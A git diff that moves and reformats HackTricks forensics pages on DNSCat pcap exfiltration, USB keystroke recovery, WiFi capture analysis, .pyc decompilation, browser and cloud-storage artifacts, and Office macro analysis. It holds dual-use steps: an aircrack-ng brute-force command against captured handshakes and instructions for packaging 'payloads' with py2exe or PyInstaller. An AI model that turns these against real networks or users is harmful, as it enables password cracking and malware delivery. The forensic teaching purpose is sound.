You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
-
Support HackTricks and get benefits!
@@ -123,5 +121,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
rename to forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md
rename to forensics/basic-forensic-methodology/pcap-inspection/README.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
similarity index 99%
rename from generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
rename to forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
index c4788db36..dd5decd0d 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
@@ -1,4 +1,4 @@
-
+# DNSCat pcap analysis
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
@@ -43,7 +42,6 @@ for p in rdpcap('ch21.pcap'):
For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
-
Support HackTricks and get benefits!
@@ -59,5 +57,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
similarity index 95%
rename from generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
rename to forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
index d48dd09d4..2284f893b 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
@@ -1,4 +1,4 @@
-
+# USB Keystrokes
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
If you have a pcap containing the communication via USB of a keyboard like the following one:
![](<../../../.gitbook/assets/image (613).png>)
@@ -28,13 +27,10 @@ tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capd
python3 usbkeyboard.py ./keystrokes.txt
```
-
-
You can read more information and find some scripts about how to analyse this in:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
-* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
-
+* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup)
@@ -51,5 +47,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
similarity index 96%
rename from generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
rename to forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index 8f00a5199..9920eaaa7 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -1,4 +1,4 @@
-
+# Wifi Pcap Analysis
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Check BSSIDs
+## Check BSSIDs
When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
@@ -25,7 +24,7 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
![](<../../../.gitbook/assets/image (425).png>)
-## Brute Force
+### Brute Force
One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
@@ -33,11 +32,11 @@ One of the columns of that screen indicates if **any authentication was found in
aircrack-ng -w pwds-file.txt -b file.pcap
```
-# Data in Beacons / Side Channel
+## Data in Beacons / Side Channel
If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
-# Find unknown MAC addresses in a Wiffi network
+## Find unknown MAC addresses in a Wiffi network
The following link will be useful to find the **machines sending data inside a Wifi Network**:
@@ -47,16 +46,12 @@ If you already know **MAC addresses you can remove them from the output** adding
Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
-# Decrypt Traffic
+## Decrypt Traffic
Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
![](<../../../.gitbook/assets/image (426).png>)
-
-
-
-
Support HackTricks and get benefits!
@@ -72,5 +67,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
rename to forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
similarity index 95%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index 6812c413d..b3adafdfd 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -1,4 +1,4 @@
-
+# Decompile compiled python binaries (exe, elf) - Retreive from .pyc
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# From Compiled Binary to .pyc
+## From Compiled Binary to .pyc
From an **ELF** compiled binary you can **get the .pyc** with:
@@ -46,7 +45,7 @@ In an **python exe binary** compiled you can **get the .pyc** by running:
python pyinstxtractor.py executable.exe
```
-# From .pyc to python code
+## From .pyc to python code
For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
@@ -58,7 +57,7 @@ uncompyle6 binary.pyc > decompiled.py
While executing **uncompyle6** you might find the **following errors**:
-## Error: Unknown magic number 227
+### Error: Unknown magic number 227
```bash
/kali/.local/bin/uncompyle6 /tmp/binary.pyc
@@ -89,7 +88,7 @@ hexdump 'binary.pyc' | head
0000030 0164 006c 005a 0064 0164 016c 015a 0064
```
-## Error: Decompiling generic errors
+### Error: Decompiling generic errors
**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear.
@@ -97,13 +96,13 @@ This probably means that you **haven't added correctly** the magic number or tha
Check the previous error documentation.
-# Automatic Tool
+## Automatic Tool
The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller).
Several YARA rules are available to determine if the executable is written in python (This script also confirms if the executable is created with either py2exe or pyinstaller).
-## ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
+### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
Currently with unpy2exe or pyinstxtractor the Python bytecode file we get might not be complete and in turn it **canāt be recognized by uncompyle6 to get the plain Python source code**. This is caused by a missing Python **bytecode version number**. Therefore we included a prepend option; this will include a Python bytecode version number into it and help to ease the process of decompiling. When we try to use uncompyle6 to decompile the .pyc file it returns an error. However, **once we use the prepend option we can see that the Python source code has been decompiled successfully**.
@@ -123,7 +122,7 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
[+] Successfully decompiled.
```
-# Analyzing python assembly
+## Analyzing python assembly
If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **dissasemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
@@ -170,11 +169,11 @@ True
17 RETURN_VALUE
```
-# Python to Executable
+## Python to Executable
To start off weāre going to show you how payloads can be compiled in py2exe and PyInstaller.
-## To create a payload using py2exe:
+### To create a payload using py2exe:
1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option ābundle\_filesā with the value of 1 will bundle everything including Python interpreter into one exe.
@@ -208,7 +207,7 @@ copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\te
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
-## To create a payload using PyInstaller:
+### To create a payload using PyInstaller:
1. Install PyInstaller using pip (pip install pyinstaller).
2. After that, we will issue the command āpyinstaller āonefile hello.pyā (a reminder that āhello.pyā is our payload). This will bundle everything into one executable.
@@ -226,11 +225,10 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
```
-# References
+## References
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
-
Support HackTricks and get benefits!
@@ -246,5 +244,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
similarity index 69%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
index 3c0db1da3..62591b36e 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
@@ -1,4 +1,4 @@
-
+# Specific Software/File-Type Tricks
@@ -16,30 +16,43 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
Here you can find interesting tricks for specific file-types and/or software:
-{% page-ref page=".pyc.md" %}
+{% content-ref url=".pyc.md" %}
+[.pyc.md](.pyc.md)
+{% endcontent-ref %}
-{% page-ref page="browser-artifacts.md" %}
+{% content-ref url="browser-artifacts.md" %}
+[browser-artifacts.md](browser-artifacts.md)
+{% endcontent-ref %}
-{% page-ref page="desofuscation-vbs-cscript.exe.md" %}
+{% content-ref url="desofuscation-vbs-cscript.exe.md" %}
+[desofuscation-vbs-cscript.exe.md](desofuscation-vbs-cscript.exe.md)
+{% endcontent-ref %}
-{% page-ref page="local-cloud-storage.md" %}
+{% content-ref url="local-cloud-storage.md" %}
+[local-cloud-storage.md](local-cloud-storage.md)
+{% endcontent-ref %}
-{% page-ref page="office-file-analysis.md" %}
-
-{% page-ref page="pdf-file-analysis.md" %}
-
-{% page-ref page="png-tricks.md" %}
-
-{% page-ref page="video-and-audio-file-analysis.md" %}
-
-{% page-ref page="zips-tricks.md" %}
+{% content-ref url="office-file-analysis.md" %}
+[office-file-analysis.md](office-file-analysis.md)
+{% endcontent-ref %}
+{% content-ref url="pdf-file-analysis.md" %}
+[pdf-file-analysis.md](pdf-file-analysis.md)
+{% endcontent-ref %}
+{% content-ref url="png-tricks.md" %}
+[png-tricks.md](png-tricks.md)
+{% endcontent-ref %}
+{% content-ref url="video-and-audio-file-analysis.md" %}
+[video-and-audio-file-analysis.md](video-and-audio-file-analysis.md)
+{% endcontent-ref %}
+{% content-ref url="zips-tricks.md" %}
+[zips-tricks.md](zips-tricks.md)
+{% endcontent-ref %}
@@ -56,5 +69,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
similarity index 92%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index ef7b96312..b9e0a1373 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -1,4 +1,4 @@
-
+# Browser Artifacts
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Browsers Artefacts
+## Browsers Artefacts
When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache dataā¦etc.
@@ -35,19 +34,19 @@ Let us take a look at the most common artefacts stored by browsers.
* **Logins :** Self Explanatory.
* **Favicons :** They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited.
* **Browser Sessions :** Self Explanatory.
-* **Downloads :**Self Explanatory.
+* \*\*Downloads :\*\*Self Explanatory.
* **Form Data :** Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data.
* **Thumbnails :** Self Explanatory.
-# Firefox
+## Firefox
-Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
+Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).\
-Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the **_**profiles.ini**_** exist**. If it isn't, then, probably it was deleted.
+Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the \_profiles.ini**\_\*\* exist\*\*. If it isn't, then, probably it was deleted.
Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) path you should be able to find the following interesting files:
-* _**places.sqlite**_ : History (moz_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\__annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_.
+* _**places.sqlite**_ : History (moz\_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\_\_annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_.
* Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;`
* Note that the link type is a number that indicates:
* 1: User followed a link
@@ -64,7 +63,7 @@ Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) pa
* _**formhistory.sqlite**_ : **Web form data** (like emails)
* _**handlers.json**_ : Protocol handlers (like, which app is going to handle _mailto://_ protocol)
* _**persdict.dat**_ : Words added to the dictionary
-* _**addons.json**_ and _**extensions.sqlite** _ : Installed addons and extensions
+* _**addons.json**_ and \_**extensions.sqlite** \_ : Installed addons and extensions
* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file.
* _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**.
@@ -98,9 +97,9 @@ done < $passfile
![](<../../../.gitbook/assets/image (417).png>)
-# Google Chrome
+## Google Chrome
-Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in _**/Users/$USER/Library/Application Support/Google/Chrome/** _ (MacOS).\
+Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in \_**/Users/$USER/Library/Application Support/Google/Chrome/** \_ (MacOS).\
Most of the information will be saved inside the _**Default/**_ or _**ChromeDefaultData/**_ folders inside the paths indicated before. Inside here you can find the following interesting files:
* _**History**_ : URLs, downloads and even searched keywords. In Windows you can use the tool [ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html) to read the history. The "Transition Type" column means:
@@ -125,11 +124,11 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa
* **Browserās built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
* You can simply grep for ā**safebrowsing**ā and look for `{"enabled: true,"}` in the result to indicate anti-phishing and malware protection is on.
-# **SQLite DB Data Recovery**
+## **SQLite DB Data Recovery**
As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
-# **Internet Explorer 11**
+## **Internet Explorer 11**
Internet Explorer stores **data** and **metadata** in different locations. The metadata will allow to find the data.
@@ -145,11 +144,11 @@ Inside this table you can find in which other tables or containers each part of
**Note that this table indicate also metadadata of the cache of other Microsoft tools also (e.g. skype)**
-## Cache
+### Cache
You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date.
-### Metadata
+#### Metadata
The metadata information about the cache stores:
@@ -160,19 +159,19 @@ The metadata information about the cache stores:
* CreationTime: First time it was cached
* AccessedTime: Time when the cache was used
* ModifiedTime: Last webpage version
-* ExpiryTime: Time when the cache will expire
+* ExpiryTime: Time when the cache will expire
-### Files
+#### Files
The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_
The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS).
-## Cookies
+### Cookies
You can use the tool [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) to inspect the cookies. You need to indicate the folder where you have extracted the cookies.
-### **Metadata**
+#### **Metadata**
The metadata information about the cookies stores:
@@ -184,15 +183,15 @@ The metadata information about the cookies stores:
* AccessedTime: Last time the cookie was accesed
* ExpiryTime: Time of expiration of the cookie
-### Files
+#### Files
The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_
Session cookies will reside in memory and persistent cookie in the disk.
-## Downloads
+### Downloads
-### **Metadata**
+#### **Metadata**
Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) you can find the container with the metadata of the downloads:
@@ -200,25 +199,25 @@ Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\
Getting the information of the column "ResponseHeaders" you can transform from hex that information and obtain the URL, the file type and the location of the downloaded file.
-### Files
+#### Files
Look in the path _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_
-## **History**
+### **History**
The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history. But first you need to indicate the browser in advanced options and the location of the extracted history files.
-### **Metadata**
+#### **Metadata**
* ModifiedTime: First time a URL is found
* AccessedTime: Last time
* AccessCount: Number of times accessed
-### **Files**
+#### **Files**
-Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_
+Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_
-## **Typed URLs**
+### **Typed URLs**
This information can be found inside the registry NTDUSER.DAT in the path:
@@ -227,7 +226,7 @@ This information can be found inside the registry NTDUSER.DAT in the path:
* _**Software\Microsoft\InternetExplorer\TypedURLsTime**_
* last time the URL was typed
-# Microsoft Edge
+## Microsoft Edge
For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section (IE 11) remain valid** with the only difference that the base locating in this case is _**%userprofile%\Appdata\Local\Packages**_ (as can be observed in the following paths):
@@ -237,7 +236,7 @@ For analyzing Microsoft Edge artifacts all the **explanations about cache and lo
* Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC#!XXX\MicrosoftEdge\Cache**_
* Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_
-# **Safari**
+## **Safari**
The databases can be found in `/Users/$User/Library/Safari`
@@ -256,7 +255,7 @@ The databases can be found in `/Users/$User/Library/Safari`
* **Browserās built-in anti-phishing:** `defaults read com.apple.Safari WarnAboutFraudulentWebsites`
* The reply should be 1 to indicate the setting is active
-# Opera
+## Opera
The databases can be found in `/Users/$USER/Library/Application Support/com.operasoftware.Opera`
@@ -265,7 +264,6 @@ Opera **stores browser history and download data in the exact same format as Goo
* **Browserās built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
* **fraud\_protection\_enabled** should be **true**
-
Support HackTricks and get benefits!
@@ -281,5 +279,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
similarity index 96%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
index 9de3ab607..fb2c1d92f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
@@ -1,4 +1,4 @@
-
+# Desofuscation vbs (cscript.exe)
@@ -16,28 +16,27 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
Some things that could be useful to debug/desofuscate a malicious vbs file:
-## echo
+### echo
```bash
Wscript.Echo "Like this?"
```
-## Commnets
+### Commnets
-```text
+```
' this is a comment
```
-## Test
+### Test
-```text
+```
cscript.exe file.vbs
```
-## Write data to a file
+### Write data to a file
```aspnet
Function writeBinary(strBinary, strPath)
@@ -64,8 +63,6 @@ Function writeBinary(strBinary, strPath)
End Function
```
-
-
Support HackTricks and get benefits!
@@ -81,5 +78,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
similarity index 98%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 8372725aa..3137e1f9f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -1,4 +1,4 @@
-
+# Local Cloud Storage
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# OneDrive
+## OneDrive
In Windows you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`\
And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
@@ -33,7 +32,7 @@ And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log`
Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files syncronized with OneDrive.
-# Google Drive
+## Google Drive
In Widows you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\
This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files...\
@@ -44,9 +43,9 @@ In this table you can find: the **name** of the **synchronized** **files**, modi
The table data of the database **`Sync_config.db`** contains the email address of the account, path of the shared folders and Google Drive version.
-# Dropbox
+## Dropbox
-Dropbox uses **SQLite databases** to mange the files. In this \
+Dropbox uses **SQLite databases** to mange the files. In this\
You can find the databases in the folders:
* `\Users\\AppData\Local\Dropbox`
@@ -113,7 +112,6 @@ Other tables inside this database contain more interesting information:
* **deleted\_fields**: Dropbox deleted files
* **date\_added**
-
Support HackTricks and get benefits!
@@ -129,5 +127,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
similarity index 98%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index ecfff9dfb..529402294 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -1,4 +1,4 @@
-
+# Office file analysis
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Introduction
+## Introduction
Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts).
@@ -74,22 +73,21 @@ Sometimes the challenge is not to find hidden static data, but to **analyze a VB
$ soffice path/to/test.docx macro://./standard.module1.mymacro
```
-# [oletools](https://github.com/decalage2/oletools)
+## [oletools](https://github.com/decalage2/oletools)
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
-# Automatic Execution
+## Automatic Execution
Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automatically** **executed**.
-# References
+## References
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-
Support HackTricks and get benefits!
@@ -105,5 +103,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
similarity index 99%
